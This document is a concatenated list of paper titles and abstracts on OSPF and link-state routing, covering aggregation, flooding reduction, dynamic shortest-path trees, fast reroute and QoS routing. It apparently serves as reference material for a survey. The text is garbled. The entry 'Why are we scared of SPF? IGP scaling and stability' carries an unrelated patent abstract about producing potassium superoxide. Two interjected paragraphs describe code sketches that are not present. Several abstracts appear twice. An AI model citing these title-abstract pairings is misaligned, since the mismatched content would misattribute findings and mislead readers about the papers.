The paper also evaluates the algorithm's performance on random topologies. Our results show that in some cases, the algorithm is capable of reducing the number of aggregates by as much as 50% with only a relatively small introduction of maximum path selection error. --- paper_title: Reverse path forwarding of broadcast packets paper_content: A broadcast packet is for delivery to all nodes of a network. Algorithms for accomplishing this delivery through a store-and-forward packet switching computer network include (1) transmission of separately addressed packets, (2) multidestination addressing, (3) hot potato forwarding, (4) spanning tree forwarding, and (5) source based forwarding. To this list of algorithms we add (6) reverse path forwarding, a broadcast routing method which exploits routing procedures and data structures already available for packet switching. Reverse path forwarding is a practical algorithm for broadcast routing in store-and-forward packet switching computer networks. The algorithm is described as being practical because it is not optimal according to metrics developed for its analysis in this paper, and also because it can be implemented in existing networks with less complexity than that required for the known alternatives. --- paper_title: Topology Broadcast Algorithms paper_content: Abstract This paper describes efficient distributed algorithms to broadcast network topology to all nodes in a network. They also build minimum depth spanning trees, one rooted at each node. The broadcast of the topology takes place simultaneously with the building of the spanning trees, in a way that insures that each node receives information exactly once. The algorithms are extended to work in presence of link and node failures. --- paper_title: Models for IP/MPLS routing performance: convergence, fast reroute, and QoS impact paper_content: We show how to model the black-holing and looping of traffic during an Interior Gateway Protocol (IGP) convergence event at an IP network and how to significantly improve both the convergence time and packet loss duration through IGP parameter tuning and algorithmic improvement. We also explore some congestion avoidance and congestion control algorithms that can significantly improve stability of networks in the face of occasional massive control message storms. Specifically we show the positive impacts of prioritizing Hello and Acknowledgement packets and slowing down LSA generation and retransmission generation on detecting congestion in the network. For some types of video, voice signaling and circuit emulation applications it is necessary to reduce traffic loss durations following a convergence event to below 100 ms and we explore that using Fast Reroute algorithms based on Multiprotocol Label Switching Traffic Engineering (MPLS-TE) that effectively bypasses IGP convergence. We explore the scalability of primary and backup MPLS-TE tunnels where MPLS-TE domain is in the backbone-only or edge-to-edge. We also show how much extra backbone resource is needed to support Fast Reroute and how can that be reduced by taking advantage of Constrained Shortest Path (CSPF) routing of MPLS-TE and by reserving less than 100% of primary tunnel bandwidth during Fast Reroute. --- paper_title: Why are we scared of SPF? 
IGP scaling and stability paper_content: The present invention relates to a process for preparing high purity inorganic higher oxides of the alkali and alkaline earth metals by subjecting the hydroxide of the alkali or alkaline earth metal to a radio frequency discharge sustained in oxygen. The invention is particularly adaptable to the production of high purity potassium superoxide (KO2) by subjecting potassium hydroxide to glow discharge sustained in oxygen under the pressure of about 0.75 to 1.00 torr. --- paper_title: Models for IP/MPLS routing performance: convergence, fast reroute, and QoS impact paper_content: We show how to model the black-holing and looping of traffic during an Interior Gateway Protocol (IGP) convergence event at an IP network and how to significantly improve both the convergence time and packet loss duration through IGP parameter tuning and algorithmic improvement. We also explore some congestion avoidance and congestion control algorithms that can significantly improve stability of networks in the face of occasional massive control message storms. Specifically we show the positive impacts of prioritizing Hello and Acknowledgement packets and slowing down LSA generation and retransmission generation on detecting congestion in the network. For some types of video, voice signaling and circuit emulation applications it is necessary to reduce traffic loss durations following a convergence event to below 100 ms and we explore that using Fast Reroute algorithms based on Multiprotocol Label Switching Traffic Engineering (MPLS-TE) that effectively bypasses IGP convergence. We explore the scalability of primary and backup MPLS-TE tunnels where MPLS-TE domain is in the backbone-only or edge-to-edge. We also show how much extra backbone resource is needed to support Fast Reroute and how can that be reduced by taking advantage of Constrained Shortest Path (CSPF) routing of MPLS-TE and by reserving less than 100% of primary tunnel bandwidth during Fast Reroute. --- paper_title: Optimal configuration of OSPF aggregates paper_content: Open shortest path first (OSPF) is a popular protocol for routing within an autonomous system (AS) domain. In this paper, we address the important practical problem of configuring OSPF aggregates to minimize the error in OSPF shortest path computations due to subnet aggregation. We first develop an optimal dynamic programming algorithm that, given an upper bound k on the number of aggregates to be advertised and a weight-assignment function for the aggregates, computes the k aggregates that result in the minimum cumulative error in the shortest path computations for all source-destination subnet pairs. Subsequently, we tackle the problem of assigning weights to OSPF aggregates such that the cumulative error in the computed shortest paths is minimized. We demonstrate that, while for certain special cases (e.g., unweighted cumulative error) efficient optimal algorithms for the weight-assignment problem can be devised, the general problem itself is /spl Nscr//spl Pscr/-hard. Consequently, we have to rely on search heuristics to solve the weight-assignment problem. To the best of our knowledge, our work is the first to address the algorithmic issues underlying the configuration of OSPF aggregates and to propose efficient configuration algorithms that are provably optimal for many practical scenarios. 
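The weight-assignment subproblem in the preceding aggregation reference (choosing the single cost advertised for an OSPF area aggregate so that the cumulative shortest-path error stays small) can be made concrete with a toy calculation. The sketch below is illustrative only: it covers just the unweighted absolute-error case, the function names and cost values are invented, and it is not the dynamic-programming algorithm described in the paper.

```python
def aggregate_error(component_costs, advertised):
    """Unweighted cumulative error of advertising one cost for an aggregate
    whose component subnets have the given true intra-area costs."""
    return sum(abs(advertised - c) for c in component_costs)

def best_aggregate_cost(component_costs):
    """For the unweighted absolute-error objective an optimal advertised cost
    is a median of the component costs, so scanning the components suffices."""
    return min(sorted(component_costs),
               key=lambda w: aggregate_error(component_costs, w))

# Four subnets summarized into one area range, with intra-area costs as seen
# from the area border router (values invented for the example).
costs = [10, 12, 13, 40]
best = best_aggregate_cost(costs)
print(best, aggregate_error(costs, best))   # 12 31
print(aggregate_error(costs, max(costs)))   # 85 if the largest component cost is advertised
```

Advertising the largest component cost (one conservative convention for area ranges) more than doubles the cumulative error in this toy case, which is the kind of gap the optimal weight-assignment algorithms in the reference aim to close.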
--- paper_title: OSPF: Anatomy of an Internet Routing Protocol paper_content: From the Publisher: ::: Written for TCP/IP network administrators, protocol designers, and network application developers, this book gives the most complete and practical view ever into the inner workings of Internet routing. The book focuses on OSPF (Open Shortest Path First), a common TCP/IP routing protocol that provides robust and efficient routing support in the most demanding Internet environments. A methodical and detailed description of the protocol is offered and OSPF's role within the wider context of a TCP/IP network is demonstrated. ::: Practical throughout, the book provides not only a theoretical description of Internet routing, but also a real-world look into how theory translates into practice. It shows how algorithms are implemented, and how the routing protocols function in a working network where transmission lines and routers routinely break down. ::: You will find clear explanations of such routing fundamentals as how a router forwards packets, IP addressing, CIDR (Classless Inter-Domain Routing), the routing table, Internet routing architecture, and the two main routing technologies: Distance Vector and link-state algorithms. OSPF is discussed in depth, with an examination of the rationale behind OSPF's design decisions and how it has evolved to keep pace with the rapidly changing Internet environment. OSPF topics covered by the book include the following: ::: OSPF areas and virtual links NBMA (Nonbroadcast multi-access) and Point-to-MultiPoint network segments OSPF configuration and management Interaction with other routing protocols OSPF cryptographic authentication OSPF protocol extensions, including the Demand Circuit extensions and the multicast extensions to OSPF (MOSPF) An OSPF FAQ ::: ::: IP multicast and multicast routing are also discussed. Methods for debugging routing problems are explained, including a catalog of available debugging tools. The book also offers side-by-side comparisons of all the unicast and multicast routing protocols currently in use in the Internet. ::: You will come away from this book with a sophisticated understanding of Internet routing and of the OSPF protocol in particular. Moreover, the book's practical focus will enable you to put this deeper understanding to work in your network environment. --- paper_title: An efficient algorithm for OSPF subnet aggregation paper_content: Multiple addresses within an OSPF area can be aggregated and advertised together to other areas. This process is known as address aggregation and is used to reduce router computational overheads and memory requirements and to reduce the network bandwidth consumed by OSPF messages. The downside of address aggregation is that it leads to information loss and consequently sub-optimal (non-shortest path) routing of data packets. The resulting difference (path selection error) between the length of the actual forwarding path and the shortest path varies between different sources and destinations. This paper proves that the path selection error from any source to any destination can be bounded using only parameters describing the destination area. Based on this, the paper presents an efficient algorithm that generates the minimum number of aggregates subject to a maximum allowed path selection error. 
A major operational benefit of our algorithm is that network administrators can select aggregates for an area based solely on the topology of the area without worrying about remaining areas of the OSPF network. The other benefit is that the algorithm enables trade-offs between the number of aggregates and the bound on the path selection error. The paper also evaluates the algorithm's performance on random topologies. Our results show that in some cases, the algorithm is capable of reducing the number of aggregates by as much as 50% with only a relatively small introduction of maximum path selection error. --- paper_title: Enhancing the network scalability of link-state routing protocols by reducing their flooding overhead paper_content: We consider scalability issues of routing protocols for large-scale networks. Link-state routing protocols play an important role in generalized multiprotocol label switching (GMPLS) networks based on photonic technologies as well as in conventional packet-based IP networks. The scalability of a link-state routing protocol mainly depends on the overhead of protocol-related messages, which are disseminated by flooding. We propose ways to reduce this overhead in link-state routing protocols such as OSPF and IS-IS, and also present extensions to OSPF that provide support for our techniques. The basic approach is to limit the sets of neighboring nodes in the flooding of link-state information, while maintaining reliability in the distribution of link-state information. We also report on extensive simulation to evaluate the performance of our algorithm in terms of reducing the flooding overhead. Our algorithm provides improved network scalability as well as efficient and reliable convergence of routing information. --- paper_title: A survey of QoS routing solutions for mobile ad hoc networks paper_content: In mobile ad hoc networks (MANETs), the provision of quality of service (QoS) guarantees is much more challenging than in wireline networks, mainly due to node mobility, multihop communications, contention for channel access, and a lack of central coordination. QoS guarantees are required by most multimedia and other time- or error-sensitive applications. The difficulties in the provision of such guarantees have limited the usefulness of MANETs. However, in the last decade, much research attention has focused on providing QoS assurances in MANET protocols. The QoS routing protocol is an integral part of any QoS solution since its function is to ascertain which nodes, if any, are able to serve applications? requirements. Consequently, it also plays a crucial role in data session admission control. This document offers an up-to-date survey of most major contributions to the pool of QoS routing solutions for MANETs published in the period 1997?2006. We include a thorough overview of QoS routing metrics, resources, and factors affecting performance and classify the protocols found in the literature. We also summarize their operation and describe their interactions with the medium access control (MAC) protocol, where applicable. This provides the reader with insight into their differences and allows us to highlight trends in protocol design and identify areas for future research. --- paper_title: QoS Routing Mechanisms and OSPF Extensions paper_content: This memo describes extensions to the OSPF [Moy98] protocol to support QoS routes. 
The focus of this document is on the algorithms used to compute QoS routes and on the necessary modifications to OSPF to support this function, e.g., the information needed, its format, how it is distributed, and how it is used by the QoS path selection process. Aspects related to how QoS routes are established and managed are also briefly discussed. The goal of this document is to identify a framework and possible approaches to allow deployment of QoS routing capabilities with the minimum possible impact to the existing routing infrastructure. --- paper_title: Reverse path forwarding of broadcast packets paper_content: A broadcast packet is for delivery to all nodes of a network. Algorithms for accomplishing this delivery through a store-and-forward packet switching computer network include (1) transmission of separately addressed packets, (2) multidestination addressing, (3) hot potato forwarding, (4) spanning tree forwarding, and (5) source based forwarding. To this list of algorithms we add (6) reverse path forwarding, a broadcast routing method which exploits routing procedures and data structures already available for packet switching. Reverse path forwarding is a practical algorithm for broadcast routing in store-and-forward packet switching computer networks. The algorithm is described as being practical because it is not optimal according to metrics developed for its analysis in this paper, and also because it can be implemented in existing networks with less complexity than that required for the known alternatives. --- paper_title: A reliable, efficient topology broadcast protocol for dynamic networks paper_content: We present, prove correctness for, and evaluate a protocol for the reliable broadcast of topology and link-state information in a multihop communication network with a dynamic topology, such as a wireless network with mobile nodes. The protocol is called topology broadcast based on reverse path forwarding (TBRPF), and uses the concept of reverse-path forwarding (RPF) to broadcast link-state updates in the reverse direction along the spanning tree formed by the minimum-hop paths from all nodes to the source of the update TBRPF uses the topology information received along the broadcast trees to compute the minimum-hop paths that form the trees themselves, and is the first topology broadcast protocol based on RPF with this property. The use of minimum-hop trees instead of shortest-path trees (based on link costs) results in less frequent changes to the broadcast trees and therefore less communication cost to maintain the trees. Simulations show that TBRPF achieves up to a 98% reduction in communication cost compared to flooding in a 20-node network. --- paper_title: Topology Broadcast Algorithms paper_content: Abstract This paper describes efficient distributed algorithms to broadcast network topology to all nodes in a network. They also build minimum depth spanning trees, one rooted at each node. The broadcast of the topology takes place simultaneously with the building of the spanning trees, in a way that insures that each node receives information exactly once. The algorithms are extended to work in presence of link and node failures. --- paper_title: Quality of service based routing: a performance perspective paper_content: Recent studies provide evidence that Quality of Service (QoS) routing can provide increased network utilization compared to routing that is not sensitive to QoS requirements of traffic. 
However, there are still strong concerns about the increased cost of QoS routing, both in terms of more complex and frequent computations and increased routing protocol overhead. The main goals of this paper are to study these two cost components, and propose solutions that achieve good routing performance with reduced processing cost. First, we identify the parameters that determine the protocol traffic overhead, namely (a) policy for triggering updates, (b) sensitivity of this policy, and (c) clamp down timers that limit the rate of updates. Using simulation, we study the relative significance of these factors and investigate the relationship between routing performance and the amount of update traffic. In addition, we explore a range of design options to reduce the processing cost of QoS routing algorithms, and study their effect on routing performance. Based on the conclusions of these studies, we develop extensions to the basic QoS routing, that can achieve good routing performance with limited update generation rates. The paper also addresses the impact on the results of a number of secondary factors such as topology, high level admission control, and characteristics of network traffic. --- paper_title: Packet Switching in Radio Channels: Part I -- Carrier sense multiple-access modes and their throughput-delay characteristics paper_content: Radio communication is considered as a method for providing remote terminal access to computers. Digital byte streams from each terminal are partitioned into packets (blocks) and transmitted in a burst mode over a shared radio channel. When many terminals operate in this fashion, transmissions may conflict with and destroy each other. A means for controlling this is for the terminal to sense the presence of other transmissions; this leads to a new method for multiplexing in a packet radio environment: carrier sense multiple access (CSMA). Two protocols are described for CSMA and their throughput-delay characteristics are given. These results show the large advantage CSMA provides as compared to the random ALOHA access modes. --- paper_title: Multi-point Relaying Techniques with OSPF on Ad Hoc Networks paper_content: Incorporating multi-hop ad hoc wireless networks in the IP infrastructure is an effort to which a growing community participates. One instance of such activity is the extension of the most widely deployed interior gateway routing protocol on the Internet, OSPF (Open Shortest Path First), for operation on Mobile Ad hoc Networks (MANETs). Such extension allows OSPF to work on heterogeneous networks encompassing both wired and wireless routers, which may self-organize as multi-hop wireless subnetworks, and be mobile. Three solutions have been proposed for this extension, among which two based on techniques derived from multi-point relaying (MPR). This paper analyzes these two approaches and identifies some fundamental discussion items that pertain to adapting OSPF mechanisms to multihop wireless networking, before concluding with a proposal for a unique, merged solution based on this analysis. --- paper_title: Experience in black-box OSPF measurement paper_content: OSPF (Open Shortest Path First) is a widely used intra-domain routing protocol in IP networks. Internal processing delays in OSPF implementations impact the speed at which updates propagate in the network, the load on individual routers, and the time needed for both intra-domain and inter-domain routing to reconverge following an internal topology or a configuration change.
An OSPF user, such as an Internet Service Provider, typically has no access to the software implementation, and no way to estimate these delays directly. In this paper, we present black-box methods (i.e., measurements that rely only on external observations) for estimating and trending delays for key internal tasks in OSPF: processing Link State Advertisements (LSAs), performing Shortest Path First calculations, updating the Forwarding Information Base, and flooding LSAs. Corresponding measurements are reported for production routers from Cisco Systems. To help validate the methodology, black-box and white-box measurements (i.e., measurements that rely on internal instrumentation) are reported for an open source OSPF implementation, GateD. --- paper_title: Introduction to Algorithms paper_content: From the Publisher: The updated new edition of the classic Introduction to Algorithms is intended primarily for use in undergraduate or graduate courses in algorithms or data structures. Like the first edition, this text can also be used for self-study by technical professionals since it discusses engineering issues in algorithm design as well as the mathematical aspects. In its new edition, Introduction to Algorithms continues to provide a comprehensive introduction to the modern study of algorithms. The revision has been updated to reflect changes in the years since the book's original publication. New chapters on the role of algorithms in computing and on probabilistic analysis and randomized algorithms have been included. Sections throughout the book have been rewritten for increased clarity, and material has been added wherever a fuller explanation has seemed useful or new information warrants expanded coverage. As in the classic first edition, this new edition of Introduction to Algorithms presents a rich variety of algorithms and covers them in considerable depth while making their design and analysis accessible to all levels of readers. Further, the algorithms are presented in pseudocode to make the book easily accessible to students from all programming language backgrounds. Each chapter presents an algorithm, a design technique, an application area, or a related topic. The chapters are not dependent on one another, so the instructor can organize his or her use of the book in the way that best suits the course's needs. Additionally, the new edition offers a 25% increase over the first edition in the number of problems, giving the book 155 problems and over 900 exercises that reinforce the concepts the students are learning. --- paper_title: Semi-Dynamic Shortest Paths and Breadth-First Search in Digraphs paper_content: We show how to maintain a shortest path tree of a general directed graph G with unit edge weights and n vertices, during a sequence of edge deletions or a sequence of edge insertions, in O(n) amortized time per operation using linear space. Distance queries can be answered in constant time, while shortest path queries can be answered in time linear in the length of the retrieved path. These results are extended to the case of integer edge weights in [1,C], with a bound of O(Cn) amortized time per operation. --- paper_title: The New Routing Algorithm for the ARPANET paper_content: The new ARPANET routing algorithm is an improvement over the old procedure in that it uses fewer network resources, operates on more realistic estimates of network conditions, reacts faster to important network changes, and does not suffer from long-term loops or oscillations.
In the new procedure, each node in the network maintains a database describing the complete network topology and the delays on all lines, and uses the database describing the network to generate a tree representing the minimum delay paths from a given root node to every other network node. Because the traffic in the network can be quite variable, each node periodically measures the delays along its outgoing lines and forwards this information to all other nodes. The delay information propagates quickly through the network so that all nodes can update their databases and continue to route traffic in a consistent and efficient manner. An extensive series of tests were conducted on the ARPANET, showing that line overhead and CPU overhead are both less than two percent, most nodes learn of an update within 100 ms, and the algorithm detects congestion and routes packets around congested areas. --- paper_title: Scheduling routing table calculations to achieve fast convergence in OSPF protocol paper_content: Fast convergence to topology changes is now a key requirement in routing infrastructures while reducing the routing protocol’s processing overhead continues to be as important as before. In this paper, we examine the problem of scheduling routing table updates in link state routing protocols. Commercial routers typically use a hold time based scheme to limit the number of routing table updates as new LSAs arrive at the router. The hold time schemes limit the number of routing table updates at the expense of increased delay in convergence to the new topology, which is clearly not acceptable any more. We analyze the performance of different hold time schemes and propose a new approach to schedule routing table updates, called LSA Correlation. Rather than using individual LSAs as triggers for routing table updates, LSA Correlation scheme correlates the information in the LSAs to identify the topology change that led to their generation. A routing table update is performed when a topology change has been identified. The analysis and simulation results presented in this paper suggest that the LSA Correlation scheme performs much better than the hold time based schemes for both isolated and large scale topology change scenarios. --- paper_title: New dynamic SPT algorithm based on a ball-and-string model paper_content: A key functionality in today's widely used interior gateway routing protocols such as OSPF and IS-IS involves the computation of a shortest path tree (SPT). In many existing commercial routers, the computation of an SPT is done from scratch following changes in the link states of the network. As there may coexist multiple SPTs in a network with a set of given link states, such recomputation of an entire SPT not only is inefficient but also causes frequent unnecessary changes in the topology of an existing SPT and creates routing instability. This paper presents a new dynamic SPT algorithm that makes use of the structure of the previously computed SPT. This algorithm is derived by recasting the SPT problem into an optimization problem in a dual linear programming framework, which can also be interpreted using a ball-and-string model. In this model, the increase (or decrease) of an edge weight in the tree corresponds to the lengthening (or shortening) of a string. By stretching the strings until each node is attached to a tight string, the resulting topology of the model defines an (or multiple) SPT(s). 
By emulating the dynamics of the ball-and-string model, we can derive an efficient algorithm that propagates changes in distances to all affected nodes in a natural order and in a most economical way. Compared with existing results, our algorithm has the best-known performance in terms of computational complexity as well as minimum changes made to the topology of an SPT. Rigorous proofs for correctness of our algorithm and simulation results illustrating its complexity are also presented. --- paper_title: Avoiding instability during graceful shutdown of OSPF paper_content: In this paper, we describe an enhancement to OSPF, called the IBB (I'll Be Back) capability, that enables other routers to use a router whose OSPF process is inactive for forwarding traffic for a certain period of time. The IBB capability can be used for avoiding route flaps that occur when the OSPF process is brought down in a router to facilitate protocol software upgrade, operating system upgrade, router ID change, AS and interface renumbering, etc. When the OSPF process in an IBB-capable router is inactive, it cannot adapt its forwarding table to reflect changes in network topology. This can lead to routing loops and/or black holes. We provide a detailed analysis of how and when loops or black holes are formed and propose solutions to prevent them. Using the GateD platform, we have developed an IBB extension to OSPF incorporating these solutions. Using this system in an experimental setup, we demonstrate that the overhead of the IBB extension is modest compared to the benefit it offers, and has good scaling behavior in terms of network size and the number of routers with inactive OSPF processes. --- paper_title: An Incremental Algorithm for a Generalization of the Shortest-Path Problem paper_content: Thegrammar problem, a generalization of the single-source shortest-path problem introduced by D. E. Knuth (Inform. Process. Lett.6(1) (1977), 1?5) is to compute the minimum-cost derivation of a terminal string from each nonterminal of a given context-free grammar, with the cost of a derivation being suitably defined. This problem also subsumes the problem of finding optimal hyperpaths in directed hypergraphs (under varying optimization criteria) that has received attention recently. In this paper we present an incremental algorithm for a version of the grammar problem. As a special case of this algorithm we obtain an efficient incremental algorithm for the single-source shortest-path problem with positive edge lengths. The aspect of our work that distinguishes it from other work on the dynamic shortest-path problem is its ability to handle “multiple heterogeneous modifications”: between updates, the input graph is allowed to be restructured by an arbitrary mixture of edge insertions, edge deletions, and edge-length changes. --- paper_title: Semi-Dynamic Shortest Paths and Breadth-First Search in Digraphs paper_content: We show how to maintain a shortest path tree of a general directed graph G with unit edge weights and n vertices, during a sequence of edge deletions or a sequence of edge insertions, in O(n) amortized time per operation using linear space. Distance queries can be answered in constant time, while shortest path queries can be answered in time linear in the length of the retrieved path. These results are extended to the case of integer edge weights in [1,C], with a bound of O(Cn) amortized time per operation. 
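All of the static, dynamic, and semi-dynamic SPT results collected above are measured against the same baseline that an OSPF router runs today: a full Dijkstra computation over the link-state database. As a point of reference, the following sketch shows that baseline on a toy topology; the graph, costs, and function name are invented for the example and do not come from any of the cited papers.

```python
import heapq

def spf(lsdb, root):
    """Plain Dijkstra over a link-state database given as
    {router: {neighbor: cost}}. Returns (dist, parent): the shortest-path
    tree that a router would turn into routing-table entries."""
    dist, parent = {root: 0}, {root: None}
    heap = [(0, root)]
    done = set()
    while heap:
        d, u = heapq.heappop(heap)
        if u in done:
            continue
        done.add(u)
        for v, cost in lsdb.get(u, {}).items():
            if d + cost < dist.get(v, float("inf")):
                dist[v], parent[v] = d + cost, u
                heapq.heappush(heap, (d + cost, v))
    return dist, parent

# Toy topology with symmetric costs (OSPF does not require symmetry).
lsdb = {
    "A": {"B": 1, "C": 4},
    "B": {"A": 1, "C": 2, "D": 5},
    "C": {"A": 4, "B": 2, "D": 1},
    "D": {"B": 5, "C": 1},
}
print(spf(lsdb, "A"))
# ({'A': 0, 'B': 1, 'C': 3, 'D': 4}, {'A': None, 'B': 'A', 'C': 'B', 'D': 'C'})
```

The incremental and semi-dynamic algorithms surveyed above aim to avoid rerunning this computation from scratch when only a few link states change; the full run is what a naive implementation pays on every LSA.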
--- paper_title: The New Routing Algorithm for the ARPANET paper_content: The new ARPANET routing algorithm is an improvement over the old procedure in that it uses fewer network resources, operates on more realistic estimates of network conditions, reacts faster to important network changes, and does not suffer from long-term loops or oscillations. In the new procedure, each node in the network maintains a database describing the complete network topology and the delays on all lines, and uses the database describing the network to generate a tree representing the minimum delay paths from a given root node to every other network node. Because the traffic in the network can be quite variable, each node periodically measures the delays along its outgoing lines and forwards this information to all other nodes. The delay information propagates quickly through the network so that all nodes can update their databases and continue to route traffic in a consistent and efficient manner. An extensive series of tests were conducted on the ARPANET, showing that line overhead and CPU overhead are both less than two percent, most nodes learn of an update within 100 ms, and the algorithm detects congestion and routes packets around congested areas. --- paper_title: Avoiding instability during graceful shutdown of multiple OSPF routers paper_content: Many recent router architectures decouple the routing engine from the forwarding engine, allowing packet forwarding to continue even when the routing process is not active. This opens up the possibility of using the forwarding capability of a router even when its routing process is brought down for software upgrade or maintenance, thus avoiding the route flaps that normally occur when the routing process goes down. Unfortunately, current routing protocols, such as BGP, OSPF and IS-IS do not support such operation. In an earlier paper [1], we described an enhancement to OSPF, called the IBB (I'll Be Back) capability, that enables a router to continue forwarding packets while its routing process is inactive.When the OSPF process in an IBB-capable router is inactive, it cannot adapt its forwarding table to reflect changes in network topology. This can lead to routing loops and/or black holes. In this paper, we focus on the loop problem and provide a detailed analysis of how and when loops are formed and propose solutions to prevent them. We develop two necessary conditions for the formation of routing loops in the general case when multiple routers are inactive. These conditions can easily be checked by the neighbors of the inactive routers. Simulations on several network topologies showed that checking the two conditions together signaled a loop in most cases only when a loop actually existed. --- paper_title: New dynamic SPT algorithm based on a ball-and-string model paper_content: A key functionality in today's widely used interior gateway routing protocols such as OSPF and IS-IS involves the computation of a shortest path tree (SPT). In many existing commercial routers, the computation of an SPT is done from scratch following changes in the link states of the network. As there may coexist multiple SPTs in a network with a set of given link states, such recomputation of an entire SPT not only is inefficient but also causes frequent unnecessary changes in the topology of an existing SPT and creates routing instability. This paper presents a new dynamic SPT algorithm that makes use of the structure of the previously computed SPT. 
This algorithm is derived by recasting the SPT problem into an optimization problem in a dual linear programming framework, which can also be interpreted using a ball-and-string model. In this model, the increase (or decrease) of an edge weight in the tree corresponds to the lengthening (or shortening) of a string. By stretching the strings until each node is attached to a tight string, the resulting topology of the model defines an (or multiple) SPT(s). By emulating the dynamics of the ball-and-string model, we can derive an efficient algorithm that propagates changes in distances to all affected nodes in a natural order and in a most economical way. Compared with existing results, our algorithm has the best-known performance in terms of computational complexity as well as minimum changes made to the topology of an SPT. Rigorous proofs for correctness of our algorithm and simulation results illustrating its complexity are also presented. --- paper_title: An overview of routing optimization for internet traffic engineering paper_content: Traffic engineering is an important mechanism for Internet network providers seeking to optimize network performance and traffic delivery. Routing optimization plays a key role in traffic engineering, finding efficient routes so as to achieve the desired network performance. In this survey we review Internet traffic engineering from the perspective of routing optimization. A taxonomy of routing algorithms in the literature is provided, dating from the advent of the TE concept in the late 1990s. We classify the algorithms into multiple dimensions: unicast/multicast, intra-/inter- domain, IP-/MPLS-based and offline/online TE schemes. In addition, we investigate some important traffic engineering issues, including robustness, TE interactions, and interoperability with overlay selfish routing. In addition to a review of existing solutions, we also point out some challenges in TE operation and important issues that are worthy of investigation in future research activities. --- paper_title: Constraint-Based Routing in the Internet: Basic Principles and Recent Research paper_content: Novel routing paradigms based on policies, quality of service (QoS) requirements, and packet content have been proposed for the Internet over the last decade. Constraint-based routing algorithms select a routing path satisfying constraints that are either administrative-oriented (policy routing) or service-oriented (QoS routing). The routes, in addition to satisfying constraints, are selected to reduce costs, balance network load, or increase security. In this article, we discuss several constraint-based routing approaches and explain their requirements, complexity, and recent research proposals. In addition, we illustrate how these approaches can be integrated with Internet label switching and QoS architectures. We also discuss examples of application-level routing techniques used in today's Internet. --- paper_title: A survey of IP and multiprotocol label switching fast reroute schemes paper_content: One of the desirable features of any network is its ability to keep services running despite a link or node failure. This ability is usually referred to as network resilience and has become a key demand from service providers. Resilient networks recover from a failure by repairing themselves automatically by diverting traffic from the failed part of the network to another portion of the network. 
This traffic diversion process should be fast enough to ensure that the interruption of service due to a link or node failure is either unnoticeable or as small as possible. The new path taken by a diverted traffic can be computed at the time a failure occurs through a procedure called rerouting. Alternatively the path can be computed before a failure occurs through a procedure called fast reroute. Much attention is currently being paid to fast reroute because service providers who are used to the 50-ms failure recovery time associated with SONET networks are demanding the same feature from IP and MPLS networks. While this requirement can easily be met in SONET because it operates at the physical layer, it is not easily met in IP and MPLS networks that operate above the physical layer. However, over the last few years, several schemes have been proposed for accomplishing 50-ms fast reroutes for IP and MPLS networks. The purpose of this paper is to provide a survey of the IP fast reroute and MPLS fast reroute schemes that have been proposed. --- paper_title: IP fast rerouting for single-link/node failure recovery paper_content: Failure recovery in IP networks is critical to high quality service provisioning. The main challenge is how to achieve fast recovery without introducing high complexity and resource usage. Today’s networks mainly use route recalculation and lower layer protection. However, route recalculation could take as long as seconds to complete; while lower layer protection usually requires considerable bandwidth redundancy. We present two fast rerouting algorithms to achieve recovery from single-link and single-node failures, respectively. The idea is to calculated backup paths in advance. When a failure is detected, the affected packets are immediately forwarded through backup paths to shorten the service disruption. This paper answers the following questions: 1. How to find backup paths? 2. How to coordinate routers during the rerouting without explicit signaling? 3. How to realize distributed implementation? The schemes react to failures very fast because there are no calculations on the fly. They are also cost efficient because no bandwidth reservation is required. Our schemes guarantee 100% failure recovery without any assumption on the primary paths. Simulations show that our schemes yield comparable performance to shortest path route recalculation. This work illuminates the possibility of using pure IP layer solutions to build highly survivable yet cost-efficient networks. --- paper_title: Disruption Free Topology Reconfiguration in OSPF Networks paper_content: A few modifications to software and/or hardware of routers have been proposed recently to avoid the transient micro loops that can occur during the convergence of link-state interior gateway protocols like IS-IS and OSPF. We1 propose in this paper a technique that does not require modifications to ISIS and OSPF, and that can be applied now by ISPs. Roughly, in the case of a manual modification of the state of a link, we progressively change the metric associated with this link to reach the required modification by ensuring that each step of the progression will be loop-free. The number of changes that are applied to a link to reach the targeted state by ensuring the transient consistency of the forwarding inside the network is minimized. Analysis performed on real regional and tier-1 ISP topologies show that the number of required transient changes is small. 
The solution can be applied in the case of link metric updates, manual set up, and shut down of links. --- paper_title: OSPF: Anatomy of an Internet Routing Protocol paper_content: From the Publisher: Written for TCP/IP network administrators, protocol designers, and network application developers, this book gives the most complete and practical view ever into the inner workings of Internet routing. The book focuses on OSPF (Open Shortest Path First), a common TCP/IP routing protocol that provides robust and efficient routing support in the most demanding Internet environments. A methodical and detailed description of the protocol is offered and OSPF's role within the wider context of a TCP/IP network is demonstrated. Practical throughout, the book provides not only a theoretical description of Internet routing, but also a real-world look into how theory translates into practice. It shows how algorithms are implemented, and how the routing protocols function in a working network where transmission lines and routers routinely break down. You will find clear explanations of such routing fundamentals as how a router forwards packets, IP addressing, CIDR (Classless Inter-Domain Routing), the routing table, Internet routing architecture, and the two main routing technologies: Distance Vector and link-state algorithms. OSPF is discussed in depth, with an examination of the rationale behind OSPF's design decisions and how it has evolved to keep pace with the rapidly changing Internet environment. OSPF topics covered by the book include the following: OSPF areas and virtual links; NBMA (Nonbroadcast multi-access) and Point-to-MultiPoint network segments; OSPF configuration and management; interaction with other routing protocols; OSPF cryptographic authentication; OSPF protocol extensions, including the Demand Circuit extensions and the multicast extensions to OSPF (MOSPF); and an OSPF FAQ. IP multicast and multicast routing are also discussed. Methods for debugging routing problems are explained, including a catalog of available debugging tools. The book also offers side-by-side comparisons of all the unicast and multicast routing protocols currently in use in the Internet. You will come away from this book with a sophisticated understanding of Internet routing and of the OSPF protocol in particular. Moreover, the book's practical focus will enable you to put this deeper understanding to work in your network environment. --- paper_title: IGP Link Weight Assignment for Transient Link Failures paper_content: Intra-domain routing in IP backbone networks relies on link-state protocols such as IS-IS or OSPF. These protocols associate a weight (or cost) with each network link, and compute traffic routes based on these weights. However, proposed methods for selecting link weights largely ignore the issue of failures which arise as part of everyday network operations (maintenance, accidental, etc.). Changing link weights during a short-lived failure is impractical. However, such failures are frequent enough to impact network performance. We propose a Tabu-search heuristic for choosing link weights which allow a network to function almost optimally during short link failures. The heuristic takes into account possible link failure scenarios when choosing weights, thereby mitigating the effect of such failures.
